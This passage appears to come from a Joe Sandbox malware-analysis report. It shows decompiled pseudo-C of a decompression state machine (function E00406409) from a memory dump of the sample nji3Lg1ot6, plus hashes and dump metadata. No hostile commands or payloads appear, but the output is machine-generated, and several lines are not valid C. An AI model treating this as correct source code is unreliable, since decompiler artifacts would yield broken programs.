                      													__eflags = __eax;
                      												}
                      												__edx =  *(__ebp - 8);
                      												__cl =  *(__eax + __edx);
                      												__eax =  *(__ebp - 0x14);
                      												 *(__ebp - 0x5c) = __cl;
                      												 *(__eax + __edx) = __cl;
                      												__eax = __eax + 1;
                      												__edx = 0;
                      												_t274 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t274;
                      												__eax =  *(__ebp - 0x68);
                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												_t283 = __ebp - 0x64;
                      												 *_t283 =  *(__ebp - 0x64) - 1;
                      												__eflags =  *_t283;
                      												 *( *(__ebp - 0x68)) = __cl;
                      												L79:
                      												 *(__ebp - 0x14) = __edx;
                      												goto L80;
                      											case 0x1c:
                      												while(1) {
                      													L123:
                      													__eflags =  *(__ebp - 0x64);
                      													if( *(__ebp - 0x64) == 0) {
                      														break;
                      													}
                      													__eax =  *(__ebp - 0x14);
                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      													__eflags = __eax -  *(__ebp - 0x74);
                      													if(__eax >=  *(__ebp - 0x74)) {
                      														__eax = __eax +  *(__ebp - 0x74);
                      														__eflags = __eax;
                      													}
                      													__edx =  *(__ebp - 8);
                      													__cl =  *(__eax + __edx);
                      													__eax =  *(__ebp - 0x14);
                      													 *(__ebp - 0x5c) = __cl;
                      													 *(__eax + __edx) = __cl;
                      													__eax = __eax + 1;
                      													__edx = 0;
                      													_t414 = __eax %  *(__ebp - 0x74);
                      													__eax = __eax /  *(__ebp - 0x74);
                      													__edx = _t414;
                      													__eax =  *(__ebp - 0x68);
                      													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      													__eflags =  *(__ebp - 0x30);
                      													 *( *(__ebp - 0x68)) = __cl;
                      													 *(__ebp - 0x14) = _t414;
                      													if( *(__ebp - 0x30) > 0) {
                      														continue;
                      													} else {
                      														L80:
                      														 *(__ebp - 0x88) = 2;
                      														goto L1;
                      													}
                      												}
                      												 *(__ebp - 0x88) = 0x1c;
                      												goto L170;
                      										}
                      									}
                      									L171:
                      									_t544 = _t543 | 0xffffffff;
                      									goto L172;
                      								}
                      							}
                      						}
                      					}
                      					goto L1;
                      				}
                      			}















                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                      • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                      • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                      • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00406409() {
                      				unsigned short _t531;
                      				signed int _t532;
                      				void _t533;
                      				signed int _t534;
                      				signed int _t535;
                      				signed int _t565;
                      				signed int _t568;
                      				signed int _t589;
                      				signed int* _t606;
                      				void* _t613;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t613 - 0x40) != 0) {
                      						 *(_t613 - 0x84) = 0xb;
                      						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                      						goto L132;
                      					} else {
                      						__eax =  *(__ebp - 0x28);
                      						L88:
                      						 *(__ebp - 0x2c) = __eax;
                      						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      						L89:
                      						__eax =  *(__ebp - 4);
                      						 *(__ebp - 0x80) = 0x15;
                      						__eax =  *(__ebp - 4) + 0xa68;
                      						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      						L69:
                      						 *(__ebp - 0x84) = 0x12;
                      						while(1) {
                      							L132:
                      							 *(_t613 - 0x54) = _t606;
                      							while(1) {
                      								L133:
                      								_t531 =  *_t606;
                      								_t589 = _t531 & 0x0000ffff;
                      								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      								if( *(_t613 - 0xc) >= _t565) {
                      									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      									 *(_t613 - 0x40) = 1;
                      									_t532 = _t531 - (_t531 >> 5);
                      									 *_t606 = _t532;
                      								} else {
                      									 *(_t613 - 0x10) = _t565;
                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                      								}
                      								if( *(_t613 - 0x10) >= 0x1000000) {
                      									goto L139;
                      								}
                      								L137:
                      								if( *(_t613 - 0x6c) == 0) {
                      									 *(_t613 - 0x88) = 5;
                      									L170:
                      									_t568 = 0x22;
                      									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                      									_t535 = 0;
                      									L172:
                      									return _t535;
                      								}
                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                      								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      								L139:
                      								_t533 =  *(_t613 - 0x84);
                      								while(1) {
                      									 *(_t613 - 0x88) = _t533;
                      									while(1) {
                      										L1:
                      										_t534 =  *(_t613 - 0x88);
                      										if(_t534 > 0x1c) {
                      											break;
                      										}
                      										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                      											case 0:
                      												if( *(_t613 - 0x6c) == 0) {
                      													goto L170;
                      												}
                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      												_t534 =  *( *(_t613 - 0x70));
                      												if(_t534 > 0xe1) {
                      													goto L171;
                      												}
                      												_t538 = _t534 & 0x000000ff;
                      												_push(0x2d);
                      												asm("cdq");
                      												_pop(_t570);
                      												_push(9);
                      												_pop(_t571);
                      												_t609 = _t538 / _t570;
                      												_t540 = _t538 % _t570 & 0x000000ff;
                      												asm("cdq");
                      												_t604 = _t540 % _t571 & 0x000000ff;
                      												 *(_t613 - 0x3c) = _t604;
                      												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                      												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                      												_t612 = (0x300 << _t604 + _t609) + 0x736;
                      												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                      													L10:
                      													if(_t612 == 0) {
                      														L12:
                      														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                      														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      														goto L15;
                      													} else {
                      														goto L11;
                      													}
                      													do {
                      														L11:
                      														_t612 = _t612 - 1;
                      														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                      													} while (_t612 != 0);
                      													goto L12;
                      												}
                      												if( *(_t613 - 4) != 0) {
                      													GlobalFree( *(_t613 - 4));
                      												}
                      												_t534 = GlobalAlloc(0x40, 0x600); // executed
                      												 *(_t613 - 4) = _t534;
                      												if(_t534 == 0) {
                      													goto L171;
                      												} else {
                      													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                      													goto L10;
                      												}
                      											case 1:
                      												L13:
                      												__eflags =  *(_t613 - 0x6c);
                      												if( *(_t613 - 0x6c) == 0) {
                      													 *(_t613 - 0x88) = 1;
                      													goto L170;
                      												}
                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      												_t45 = _t613 - 0x48;
                      												 *_t45 =  *(_t613 - 0x48) + 1;
                      												__eflags =  *_t45;
                      												L15:
                      												if( *(_t613 - 0x48) < 4) {
                      													goto L13;
                      												}
                      												_t546 =  *(_t613 - 0x40);
                      												if(_t546 ==  *(_t613 - 0x74)) {
                      													L20:
                      													 *(_t613 - 0x48) = 5;
                      													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                      													goto L23;
                      												}
                      												 *(_t613 - 0x74) = _t546;
                      												if( *(_t613 - 8) != 0) {
                      													GlobalFree( *(_t613 - 8));
                      												}
                      												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                      												 *(_t613 - 8) = _t534;
                      												if(_t534 == 0) {
                      													goto L171;
                      												} else {
                      													goto L20;
                      												}
                      											case 2:
                      												L24:
                      												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                      												 *(_t613 - 0x84) = 6;
                      												 *(_t613 - 0x4c) = _t553;
                      												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                      												L132:
                      												 *(_t613 - 0x54) = _t606;
                      												goto L133;
                      											case 3:
                      												L21:
                      												__eflags =  *(_t613 - 0x6c);
                      												if( *(_t613 - 0x6c) == 0) {
                      													 *(_t613 - 0x88) = 3;
                      													goto L170;
                      												}
                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      												_t67 = _t613 - 0x70;
                      												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                      												__eflags =  *_t67;
                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      												L23:
                      												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                      												if( *(_t613 - 0x48) != 0) {
                      													goto L21;
                      												}
                      												goto L24;
                      											case 4:
                      												L133:
                      												_t531 =  *_t606;
                      												_t589 = _t531 & 0x0000ffff;
                      												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      												if( *(_t613 - 0xc) >= _t565) {
                      													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      													 *(_t613 - 0x40) = 1;
                      													_t532 = _t531 - (_t531 >> 5);
                      													 *_t606 = _t532;
                      												} else {
                      													 *(_t613 - 0x10) = _t565;
                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                      												}
                      												if( *(_t613 - 0x10) >= 0x1000000) {
                      													goto L139;
                      												}
                      											case 5:
                      												goto L137;
                      											case 6:
                      												__edx = 0;
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x34) = 1;
                      													 *(__ebp - 0x84) = 7;
                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      													while(1) {
                      														L132:
                      														 *(_t613 - 0x54) = _t606;
                      														goto L133;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      												__esi =  *(__ebp - 0x60);
                      												__cl = 8;
                      												__cl = 8 -  *(__ebp - 0x3c);
                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      												__ecx =  *(__ebp - 0x3c);
                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      												__ecx =  *(__ebp - 4);
                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      												__eflags =  *(__ebp - 0x38) - 4;
                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      												if( *(__ebp - 0x38) >= 4) {
                      													__eflags =  *(__ebp - 0x38) - 0xa;
                      													if( *(__ebp - 0x38) >= 0xa) {
                      														_t98 = __ebp - 0x38;
                      														 *_t98 =  *(__ebp - 0x38) - 6;
                      														__eflags =  *_t98;
                      													} else {
                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      													}
                      												} else {
                      													 *(__ebp - 0x38) = 0;
                      												}
                      												__eflags =  *(__ebp - 0x34) - __edx;
                      												if( *(__ebp - 0x34) == __edx) {
                      													__ebx = 0;
                      													__ebx = 1;
                      													goto L61;
                      												} else {
                      													__eax =  *(__ebp - 0x14);
                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      													__eflags = __eax -  *(__ebp - 0x74);
                      													if(__eax >=  *(__ebp - 0x74)) {
                      														__eax = __eax +  *(__ebp - 0x74);
                      														__eflags = __eax;
                      													}
                      													__ecx =  *(__ebp - 8);
                      													__ebx = 0;
                      													__ebx = 1;
                      													__al =  *((intOrPtr*)(__eax + __ecx));
                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      													goto L41;
                      												}
                      											case 7:
                      												__eflags =  *(__ebp - 0x40) - 1;
                      												if( *(__ebp - 0x40) != 1) {
                      													__eax =  *(__ebp - 0x24);
                      													 *(__ebp - 0x80) = 0x16;
                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      													__eax =  *(__ebp - 0x28);
                      													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      													__eax =  *(__ebp - 0x2c);
                      													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      													__eax = 0;
                      													__eflags =  *(__ebp - 0x38) - 7;
                      													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      													__al = __al & 0x000000fd;
                      													__eax = (__eflags >= 0) - 1 + 0xa;
                      													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      													__eax =  *(__ebp - 4);
                      													__eax =  *(__ebp - 4) + 0x664;
                      													__eflags = __eax;
                      													 *(__ebp - 0x58) = __eax;
                      													goto L69;
                      												}
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 8;
                      												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      												while(1) {
                      													L132:
                      													 *(_t613 - 0x54) = _t606;
                      													goto L133;
                      												}
                      											case 8:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x84) = 0xa;
                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      												} else {
                      													__eax =  *(__ebp - 0x38);
                      													__ecx =  *(__ebp - 4);
                      													__eax =  *(__ebp - 0x38) + 0xf;
                      													 *(__ebp - 0x84) = 9;
                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      												}
                      												while(1) {
                      													L132:
                      													 *(_t613 - 0x54) = _t606;
                      													goto L133;
                      												}
                      											case 9:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													goto L89;
                      												}
                      												__eflags =  *(__ebp - 0x60);
                      												if( *(__ebp - 0x60) == 0) {
                      													goto L171;
                      												}
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                      												__eflags = _t259;
                      												0 | _t259 = _t259 + _t259 + 9;
                      												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                      												goto L76;
                      											case 0xa:
                      												goto L0;
                      											case 0xb:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__ecx =  *(__ebp - 0x24);
                      													__eax =  *(__ebp - 0x20);
                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												} else {
                      													__eax =  *(__ebp - 0x24);
                      												}
                      												__ecx =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												goto L88;
                      											case 0xc:
                      												L99:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xc;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t334 = __ebp - 0x70;
                      												 *_t334 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t334;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												__eax =  *(__ebp - 0x2c);
                      												goto L101;
                      											case 0xd:
                      												L37:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xd;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t122 = __ebp - 0x70;
                      												 *_t122 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t122;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L39:
                      												__eax =  *(__ebp - 0x40);
                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      													goto L48;
                      												}
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													goto L54;
                      												}
                      												L41:
                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      												__ecx =  *(__ebp - 0x58);
                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      												 *(__ebp - 0x48) = __eax;
                      												__eax = __eax + 1;
                      												__eax = __eax << 8;
                      												__eax = __eax + __ebx;
                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edx = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													 *(__ebp - 0x40) = 1;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													__ebx = __ebx + __ebx + 1;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edx;
                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L39;
                      												} else {
                      													goto L37;
                      												}
                      											case 0xe:
                      												L46:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xe;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t156 = __ebp - 0x70;
                      												 *_t156 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t156;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												while(1) {
                      													L48:
                      													__eflags = __ebx - 0x100;
                      													if(__ebx >= 0x100) {
                      														break;
                      													}
                      													__eax =  *(__ebp - 0x58);
                      													__edx = __ebx + __ebx;
                      													__ecx =  *(__ebp - 0x10);
                      													__esi = __edx + __eax;
                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                      													__ax =  *__esi;
                      													 *(__ebp - 0x54) = __esi;
                      													__edi = __ax & 0x0000ffff;
                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      													__eflags =  *(__ebp - 0xc) - __ecx;
                      													if( *(__ebp - 0xc) >= __ecx) {
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      														__cx = __ax;
                      														_t170 = __edx + 1; // 0x1
                      														__ebx = _t170;
                      														__cx = __ax >> 5;
                      														__eflags = __eax;
                      														 *__esi = __ax;
                      													} else {
                      														 *(__ebp - 0x10) = __ecx;
                      														0x800 = 0x800 - __edi;
                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      														__ebx = __ebx + __ebx;
                      														 *__esi = __cx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													 *(__ebp - 0x44) = __ebx;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														continue;
                      													} else {
                      														goto L46;
                      													}
                      												}
                      												L54:
                      												_t173 = __ebp - 0x34;
                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      												__eflags =  *_t173;
                      												goto L55;
                      											case 0xf:
                      												L58:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xf;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t203 = __ebp - 0x70;
                      												 *_t203 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t203;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L60:
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													L55:
                      													__al =  *(__ebp - 0x44);
                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      													goto L56;
                      												}
                      												L61:
                      												__eax =  *(__ebp - 0x58);
                      												__edx = __ebx + __ebx;
                      												__ecx =  *(__ebp - 0x10);
                      												__esi = __edx + __eax;
                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													_t217 = __edx + 1; // 0x1
                      													__ebx = _t217;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L60;
                      												} else {
                      													goto L58;
                      												}
                      											case 0x10:
                      												L109:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0x10;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t365 = __ebp - 0x70;
                      												 *_t365 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t365;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												goto L111;
                      											case 0x11:
                      												goto L69;
                      											case 0x12:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 0x58);
                      													 *(__ebp - 0x84) = 0x13;
                      													__esi =  *(__ebp - 0x58) + 2;
                      													while(1) {
                      														L132:
                      														 *(_t613 - 0x54) = _t606;
                      														goto L133;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x4c);
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      												__ecx =  *(__ebp - 0x58);
                      												__eax =  *(__ebp - 0x4c) << 4;
                      												__eflags = __eax;
                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                      												goto L130;
                      											case 0x13:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													_t469 = __ebp - 0x58;
                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                      													__eflags =  *_t469;
                      													 *(__ebp - 0x30) = 0x10;
                      													 *(__ebp - 0x40) = 8;
                      													L144:
                      													 *(__ebp - 0x7c) = 0x14;
                      													goto L145;
                      												}
                      												__eax =  *(__ebp - 0x4c);
                      												__ecx =  *(__ebp - 0x58);
                      												__eax =  *(__ebp - 0x4c) << 4;
                      												 *(__ebp - 0x30) = 8;
                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      												L130:
                      												 *(__ebp - 0x58) = __eax;
                      												 *(__ebp - 0x40) = 3;
                      												goto L144;
                      											case 0x14:
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      												__eax =  *(__ebp - 0x80);
                      												 *(_t613 - 0x88) = _t533;
